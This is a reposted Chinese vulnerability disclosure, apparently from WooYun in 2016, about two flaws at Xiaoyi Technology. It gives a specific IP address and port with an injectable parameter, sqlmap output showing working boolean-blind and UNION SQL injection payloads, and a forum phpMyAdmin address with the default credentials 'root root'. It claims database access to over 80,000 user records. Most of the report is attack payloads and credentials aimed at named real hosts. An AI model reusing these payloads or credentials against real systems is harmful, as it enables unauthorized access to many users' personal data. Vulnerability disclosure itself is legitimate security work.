记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

小蚁科技两处安全漏洞(8W+用户信息可被泄漏)

2016-07-02 00:35

code 区域
首先SQL注入

dev.xiaoyi.com:42.96.192.25

http://42.96.192.25:3133/?activityid=1





Parameter: activityid (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: activityid=1 AND 7016=7016



Type: UNION query

Title: Generic UNION query (NULL) - 9 columns

Payload: activityid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71717a7071,0x4b666875774c7a617051704869655841566d507175706e784d6651566849746347436e6b77765441,0x717a7a7a71),NULL,NULL,NULL,NULL-- -

---

[14:51:26] [INFO] testing MySQL

[14:51:26] [INFO] confirming MySQL

[14:51:27] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.0



本来还想耐心跑一下,结果又有新发现

http://forum.xiaoyi.com/phpMyAdmin/ root root

直接进论坛数据库了

11.png



1.png



一共八万多用户数据~

xiaoyi.png



xiaoyi2.png

漏洞证明:

同上

修复方案:

改密码,过滤


知识来源: www.wooyun.org/bugs/wooyun-2016-0209702

阅读:111574 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“小蚁科技两处安全漏洞(8W+用户信息可被泄漏)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云